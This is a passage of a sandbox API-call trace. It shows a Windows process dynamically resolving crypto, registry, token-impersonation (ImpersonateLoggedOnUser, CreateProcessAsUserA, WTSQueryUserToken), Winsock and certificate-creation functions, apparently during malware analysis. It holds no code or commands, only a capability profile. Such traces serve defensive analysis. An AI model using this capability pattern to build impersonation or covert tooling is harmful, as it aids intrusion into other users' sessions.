	[0187.891] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.893] GetProcAddress (hModule=0x76b10000, lpProcName="TlsFree") returned 0x76b613b8
	[0187.893] ResetEvent (hEvent=0x8) returned 1
	[0187.893] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.895] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryExW") returned 0x76b54775
	[0187.895] ResetEvent (hEvent=0x8) returned 1
	[0187.895] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.897] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleExW") returned 0x76b53e39
	[0187.898] ResetEvent (hEvent=0x8) returned 1
	[0187.898] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.900] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleFileNameA") returned 0x76b633f6
	[0187.900] ResetEvent (hEvent=0x8) returned 1
	[0187.900] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.902] GetProcAddress (hModule=0x76b10000, lpProcName="MultiByteToWideChar") returned 0x76b6452b
	[0187.902] ResetEvent (hEvent=0x8) returned 1
	[0187.902] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.904] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0187.904] ResetEvent (hEvent=0x8) returned 1
	[0187.904] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.907] GetProcAddress (hModule=0x76b10000, lpProcName="GetStdHandle") returned 0x76b61e46
	[0187.907] ResetEvent (hEvent=0x8) returned 1
	[0187.907] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.909] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileType") returned 0x76b675a5
	[0187.909] ResetEvent (hEvent=0x8) returned 1
	[0187.909] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.911] GetProcAddress (hModule=0x76b10000, lpProcName="WriteConsoleW") returned 0x76b582f1
	[0187.911] ResetEvent (hEvent=0x8) returned 1
	[0187.911] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.913] GetProcAddress (hModule=0x76b10000, lpProcName="GetACP") returned 0x76b639aa
	[0187.913] ResetEvent (hEvent=0x8) returned 1
	[0187.913] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.916] GetProcAddress (hModule=0x76b10000, lpProcName="GetStringTypeW") returned 0x76b667c8
	[0187.916] ResetEvent (hEvent=0x8) returned 1
	[0187.916] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.918] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringW") returned 0x76b613d0
	[0187.918] ResetEvent (hEvent=0x8) returned 1
	[0187.918] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.921] GetProcAddress (hModule=0x76b10000, lpProcName="ReadConsoleW") returned 0x76b70e73
	[0187.921] ResetEvent (hEvent=0x8) returned 1
	[0187.921] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.923] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x76c00000
	[0187.980] ResetEvent (hEvent=0x8) returned 1
	[0187.980] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.982] GetProcAddress (hModule=0x76c00000, lpProcName="wsprintfA") returned 0x76c13f47
	[0187.982] ResetEvent (hEvent=0x8) returned 1
	[0187.982] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.985] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x774c0000
	[0187.986] ResetEvent (hEvent=0x8) returned 1
	[0187.986] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.988] GetProcAddress (hModule=0x774c0000, lpProcName="CryptDestroyHash") returned 0x774cdf66
	[0187.988] ResetEvent (hEvent=0x8) returned 1
	[0187.989] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.991] GetProcAddress (hModule=0x774c0000, lpProcName="CryptGetHashParam") returned 0x774cdf7e
	[0187.991] ResetEvent (hEvent=0x8) returned 1
	[0187.991] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.993] GetProcAddress (hModule=0x774c0000, lpProcName="CryptGenKey") returned 0x774c8ee9
	[0187.994] ResetEvent (hEvent=0x8) returned 1
	[0187.994] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.996] GetProcAddress (hModule=0x774c0000, lpProcName="CryptReleaseContext") returned 0x774ce124
	[0187.996] ResetEvent (hEvent=0x8) returned 1
	[0187.996] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.999] GetProcAddress (hModule=0x774c0000, lpProcName="RevertToSelf") returned 0x774d1562
	[0187.999] ResetEvent (hEvent=0x8) returned 1
	[0187.999] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.001] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryInfoKeyA") returned 0x774ce143
	[0188.001] ResetEvent (hEvent=0x8) returned 1
	[0188.001] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.004] GetProcAddress (hModule=0x774c0000, lpProcName="CryptCreateHash") returned 0x774cdf4e
	[0188.004] ResetEvent (hEvent=0x8) returned 1
	[0188.004] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.006] GetProcAddress (hModule=0x774c0000, lpProcName="CryptAcquireContextA") returned 0x774c91dd
	[0188.006] ResetEvent (hEvent=0x8) returned 1
	[0188.006] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.009] GetProcAddress (hModule=0x774c0000, lpProcName="CryptGenRandom") returned 0x774cdfc8
	[0188.009] ResetEvent (hEvent=0x8) returned 1
	[0188.009] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.011] GetProcAddress (hModule=0x774c0000, lpProcName="CryptAcquireContextW") returned 0x774cdf14
	[0188.011] ResetEvent (hEvent=0x8) returned 1
	[0188.011] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.014] GetProcAddress (hModule=0x774c0000, lpProcName="CryptGetUserKey") returned 0x77503228
	[0188.014] ResetEvent (hEvent=0x8) returned 1
	[0188.014] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.016] GetProcAddress (hModule=0x774c0000, lpProcName="CryptDestroyKey") returned 0x774cc51a
	[0188.016] ResetEvent (hEvent=0x8) returned 1
	[0188.016] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.019] GetProcAddress (hModule=0x774c0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x774cca94
	[0188.019] ResetEvent (hEvent=0x8) returned 1
	[0188.019] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.021] GetProcAddress (hModule=0x774c0000, lpProcName="RegEnumKeyExA") returned 0x774d1481
	[0188.021] ResetEvent (hEvent=0x8) returned 1
	[0188.021] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.024] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExA") returned 0x774d4907
	[0188.024] ResetEvent (hEvent=0x8) returned 1
	[0188.024] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.026] GetProcAddress (hModule=0x774c0000, lpProcName="RegSetValueExA") returned 0x774d14b3
	[0188.026] ResetEvent (hEvent=0x8) returned 1
	[0188.026] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.029] GetProcAddress (hModule=0x774c0000, lpProcName="RegCreateKeyExA") returned 0x774d1469
	[0188.029] ResetEvent (hEvent=0x8) returned 1
	[0188.029] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.031] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryValueExA") returned 0x774d48ef
	[0188.031] ResetEvent (hEvent=0x8) returned 1
	[0188.031] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.034] GetProcAddress (hModule=0x774c0000, lpProcName="RegCloseKey") returned 0x774d469d
	[0188.034] ResetEvent (hEvent=0x8) returned 1
	[0188.034] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.036] GetProcAddress (hModule=0x774c0000, lpProcName="GetTokenInformation") returned 0x774d431c
	[0188.036] ResetEvent (hEvent=0x8) returned 1
	[0188.036] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.039] GetProcAddress (hModule=0x774c0000, lpProcName="ConvertSidToStringSidW") returned 0x774d4344
	[0188.039] ResetEvent (hEvent=0x8) returned 1
	[0188.039] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.041] GetProcAddress (hModule=0x774c0000, lpProcName="DuplicateToken") returned 0x774cc7e6
	[0188.041] ResetEvent (hEvent=0x8) returned 1
	[0188.041] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.044] GetProcAddress (hModule=0x774c0000, lpProcName="OpenProcessToken") returned 0x774d4304
	[0188.044] ResetEvent (hEvent=0x8) returned 1
	[0188.044] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.046] GetProcAddress (hModule=0x774c0000, lpProcName="ImpersonateLoggedOnUser") returned 0x774cc57a
	[0188.046] ResetEvent (hEvent=0x8) returned 1
	[0188.046] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.050] GetProcAddress (hModule=0x774c0000, lpProcName="GetUserNameA") returned 0x774ea4b4
	[0188.050] ResetEvent (hEvent=0x8) returned 1
	[0188.050] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.052] GetProcAddress (hModule=0x774c0000, lpProcName="RegDisablePredefinedCacheEx") returned 0x77503429
	[0188.052] ResetEvent (hEvent=0x8) returned 1
	[0188.052] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.055] GetProcAddress (hModule=0x774c0000, lpProcName="RegCreateKeyA") returned 0x774ccd01
	[0188.055] ResetEvent (hEvent=0x8) returned 1
	[0188.055] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.057] GetProcAddress (hModule=0x774c0000, lpProcName="DuplicateTokenEx") returned 0x774cca24
	[0188.057] ResetEvent (hEvent=0x8) returned 1
	[0188.057] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.060] GetProcAddress (hModule=0x774c0000, lpProcName="CreateProcessAsUserA") returned 0x77502538
	[0188.060] ResetEvent (hEvent=0x8) returned 1
	[0188.060] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.063] GetProcAddress (hModule=0x774c0000, lpProcName="CryptHashData") returned 0x774cdf36
	[0188.063] ResetEvent (hEvent=0x8) returned 1
	[0188.063] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.065] LoadLibraryW (lpLibFileName="WTSAPI32.dll") returned 0x73f10000
	[0188.067] ResetEvent (hEvent=0x8) returned 1
	[0188.067] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.069] GetProcAddress (hModule=0x73f10000, lpProcName="WTSQueryUserToken") returned 0x73f11f81
	[0188.069] ResetEvent (hEvent=0x8) returned 1
	[0188.069] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.072] LoadLibraryW (lpLibFileName="USERENV.dll") returned 0x74b30000
	[0188.082] ResetEvent (hEvent=0x8) returned 1
	[0188.082] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.085] GetProcAddress (hModule=0x74b30000, lpProcName="CreateEnvironmentBlock") returned 0x74b31a7a
	[0188.085] ResetEvent (hEvent=0x8) returned 1
	[0188.085] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.087] LoadLibraryW (lpLibFileName="WS2_32.dll") returned 0x75a90000
	[0188.090] ResetEvent (hEvent=0x8) returned 1
	[0188.090] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.092] GetProcAddress (hModule=0x75a90000, lpProcName=0x3) returned 0x75a93918
	[0188.092] ResetEvent (hEvent=0x8) returned 1
	[0188.092] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.094] GetProcAddress (hModule=0x75a90000, lpProcName=0x2) returned 0x75a94582
	[0188.094] ResetEvent (hEvent=0x8) returned 1
	[0188.094] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.096] GetProcAddress (hModule=0x75a90000, lpProcName=0x1) returned 0x75a968b6
	[0188.096] ResetEvent (hEvent=0x8) returned 1
	[0188.096] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.097] GetProcAddress (hModule=0x75a90000, lpProcName=0xd) returned 0x75a9b001
	[0188.097] ResetEvent (hEvent=0x8) returned 1
	[0188.097] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.099] GetProcAddress (hModule=0x75a90000, lpProcName=0x17) returned 0x75a93eb8
	[0188.099] ResetEvent (hEvent=0x8) returned 1
	[0188.099] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.101] GetProcAddress (hModule=0x75a90000, lpProcName=0x4) returned 0x75a96bdd
	[0188.101] ResetEvent (hEvent=0x8) returned 1
	[0188.101] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.104] GetProcAddress (hModule=0x75a90000, lpProcName=0x10) returned 0x75a96b0e
	[0188.104] ResetEvent (hEvent=0x8) returned 1
	[0188.104] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.106] GetProcAddress (hModule=0x75a90000, lpProcName=0x8) returned 0x75a92d57
	[0188.106] ResetEvent (hEvent=0x8) returned 1
	[0188.106] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.108] GetProcAddress (hModule=0x75a90000, lpProcName=0x15) returned 0x75a941b6
	[0188.108] ResetEvent (hEvent=0x8) returned 1
	[0188.108] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.110] GetProcAddress (hModule=0x75a90000, lpProcName=0x73) returned 0x75a93ab2
	[0188.110] ResetEvent (hEvent=0x8) returned 1
	[0188.110] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.112] GetProcAddress (hModule=0x75a90000, lpProcName=0x34) returned 0x75aa7673
	[0188.112] ResetEvent (hEvent=0x8) returned 1
	[0188.112] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.114] GetProcAddress (hModule=0x75a90000, lpProcName=0x16) returned 0x75a9449d
	[0188.114] ResetEvent (hEvent=0x8) returned 1
	[0188.114] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.116] GetProcAddress (hModule=0x75a90000, lpProcName=0x6f) returned 0x75a937ad
	[0188.116] ResetEvent (hEvent=0x8) returned 1
	[0188.116] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.118] GetProcAddress (hModule=0x75a90000, lpProcName=0x13) returned 0x75a96f01
	[0188.118] ResetEvent (hEvent=0x8) returned 1
	[0188.118] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.120] GetProcAddress (hModule=0x75a90000, lpProcName=0x9) returned 0x75a92d8b
	[0188.120] ResetEvent (hEvent=0x8) returned 1
	[0188.120] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.122] LoadLibraryW (lpLibFileName="SHLWAPI.dll") returned 0x771d0000
	[0188.123] ResetEvent (hEvent=0x8) returned 1
	[0188.123] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.126] GetProcAddress (hModule=0x771d0000, lpProcName="StrCmpNA") returned 0x771fc57c
	[0188.127] ResetEvent (hEvent=0x8) returned 1
	[0188.127] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.129] GetProcAddress (hModule=0x771d0000, lpProcName="StrCmpNIA") returned 0x771dd11c
	[0188.129] ResetEvent (hEvent=0x8) returned 1
	[0188.129] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.132] GetProcAddress (hModule=0x771d0000, lpProcName="wnsprintfA") returned 0x771fedae
	[0188.132] ResetEvent (hEvent=0x8) returned 1
	[0188.132] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.135] GetProcAddress (hModule=0x771d0000, lpProcName="StrStrIA") returned 0x771dd250
	[0188.135] ResetEvent (hEvent=0x8) returned 1
	[0188.135] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.138] GetProcAddress (hModule=0x771d0000, lpProcName="StrStrIW") returned 0x771e46e9
	[0188.138] ResetEvent (hEvent=0x8) returned 1
	[0188.138] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.141] GetProcAddress (hModule=0x771d0000, lpProcName="StrStrA") returned 0x771fc45b
	[0188.141] ResetEvent (hEvent=0x8) returned 1
	[0188.141] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.144] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77330000
	[0188.144] ResetEvent (hEvent=0x8) returned 1
	[0188.144] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.146] GetProcAddress (hModule=0x77330000, lpProcName="memchr") returned 0x77364c00
	[0188.146] ResetEvent (hEvent=0x8) returned 1
	[0188.146] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.149] GetProcAddress (hModule=0x77330000, lpProcName="_wcsicmp") returned 0x77386f61
	[0188.149] ResetEvent (hEvent=0x8) returned 1
	[0188.149] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.151] GetProcAddress (hModule=0x77330000, lpProcName="memcpy") returned 0x77364cc0
	[0188.151] ResetEvent (hEvent=0x8) returned 1
	[0188.151] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.156] GetProcAddress (hModule=0x77330000, lpProcName="strrchr") returned 0x77365900
	[0188.156] ResetEvent (hEvent=0x8) returned 1
	[0188.156] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.158] GetProcAddress (hModule=0x77330000, lpProcName="memcmp") returned 0x77363b1b
	[0188.158] ResetEvent (hEvent=0x8) returned 1
	[0188.158] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.161] GetProcAddress (hModule=0x77330000, lpProcName="strchr") returned 0x77377690
	[0188.161] ResetEvent (hEvent=0x8) returned 1
	[0188.161] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.163] GetProcAddress (hModule=0x77330000, lpProcName="memset") returned 0x77365340
	[0188.164] ResetEvent (hEvent=0x8) returned 1
	[0188.164] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.166] GetProcAddress (hModule=0x77330000, lpProcName="strstr") returned 0x773775c0
	[0188.166] ResetEvent (hEvent=0x8) returned 1
	[0188.166] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.168] GetProcAddress (hModule=0x77330000, lpProcName="strncpy") returned 0x77365790
	[0188.169] ResetEvent (hEvent=0x8) returned 1
	[0188.169] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.171] GetProcAddress (hModule=0x77330000, lpProcName="strncat") returned 0x77365650
	[0188.171] ResetEvent (hEvent=0x8) returned 1
	[0188.171] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.173] GetProcAddress (hModule=0x77330000, lpProcName="strncmp") returned 0x773a25ec
	[0188.173] ResetEvent (hEvent=0x8) returned 1
	[0188.174] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.176] GetProcAddress (hModule=0x77330000, lpProcName="memmove") returned 0x77365000
	[0188.176] ResetEvent (hEvent=0x8) returned 1
	[0188.176] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.179] LoadLibraryW (lpLibFileName="CRYPT32.dll") returned 0x75610000
	[0188.183] ResetEvent (hEvent=0x8) returned 1
	[0188.183] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.185] GetProcAddress (hModule=0x75610000, lpProcName="CryptExportPublicKeyInfo") returned 0x7564455f
	[0188.185] ResetEvent (hEvent=0x8) returned 1
	[0188.185] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.188] GetProcAddress (hModule=0x75610000, lpProcName="CertNameToStrA") returned 0x7566b2df
	[0188.188] ResetEvent (hEvent=0x8) returned 1
	[0188.188] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.190] GetProcAddress (hModule=0x75610000, lpProcName="CertCreateSelfSignCertificate") returned 0x75667a93
	[0188.190] ResetEvent (hEvent=0x8) returned 1
	[0188.190] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.193] GetProcAddress (hModule=0x75610000, lpProcName="CertFreeCertificateContext") returned 0x7561f5b5
	[0188.193] ResetEvent (hEvent=0x8) returned 1
	[0188.193] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.195] GetProcAddress (hModule=0x75610000, lpProcName="CryptSignAndEncodeCertificate") returned 0x756674a1
	[0188.195] ResetEvent (hEvent=0x8) returned 1
	[0188.195] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.198] GetProcAddress (hModule=0x75610000, lpProcName="CertCloseStore") returned 0x7561dd10
	[0188.198] ResetEvent (hEvent=0x8) returned 1
	[0188.198] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.201] GetProcAddress (hModule=0x75610000, lpProcName="CertStrToNameA") returned 0x7566b33a
	[0188.201] ResetEvent (hEvent=0x8) returned 1
	[0188.201] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.209] GetProcAddress (hModule=0x75610000, lpProcName="CryptEncodeObject") returned 0x75624ba9
	[0188.209] ResetEvent (hEvent=0x8) returned 1
	[0188.209] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.211] GetProcAddress (hModule=0x75610000, lpProcName="CertSetCertificateContextProperty") returned 0x7562bb05
	[0188.211] ResetEvent (hEvent=0x8) returned 1
	[0188.211] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
